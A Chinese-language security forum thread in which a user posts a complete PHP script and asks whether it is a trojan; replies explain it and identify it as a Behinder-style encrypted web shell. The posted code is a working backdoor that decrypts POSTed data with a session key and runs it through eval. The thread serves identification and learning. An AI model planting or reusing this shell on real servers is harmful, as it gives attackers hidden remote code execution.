首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 求助问答
    3. 发新帖
未解决 [求助]这是木马么?
发表于: 2021-3-9 13:53 5891

未解决 [求助]这是木马么?

wx_三五瓶 活跃值
2021-3-9 13:53
5891
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
 
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15];
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>

这应该是木马吧,但是我没看懂是怎么连接访问的,有老哥解释一下吗


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (4)
不对
雪    币: 7065
活跃值: (3106)
能力值: ( LV4,RANK:52 )
在线值:
发帖
回帖
粉丝
私信
2
有这个eval,大概率是个木马,根据我一天没学过php的理解,大概意思是会先通过get方式加载一个pass的参数,里面的是后续的秘钥key,存入session里面,再通过POST的方式上传一个执行代码,openssl加载成功的话就用AES128结合key进行解密,如果没加载成功就用base64decode + 异或解密,最后eval执行
2021-3-9 15:27
0
tank小王子
雪    币: 12476
活跃值: (9432)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
冰蝎的php一句话木马(虽然它好几句~)
2021-3-9 15:54
0
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
不对 有这个eval,大概率是个木马,根据我一天没学过php的理解,大概意思是会先通过get方式加载一个pass的参数,里面的是后续的秘钥key,存入session里面,再通过POST的方式上传一个执行代码 ...
多谢老哥的解答
2021-3-9 18:16
0
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
Genes 冰蝎的php一句话木马(虽然它好几句~)
多谢多谢,我去研究看看
2021-3-9 18:17
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//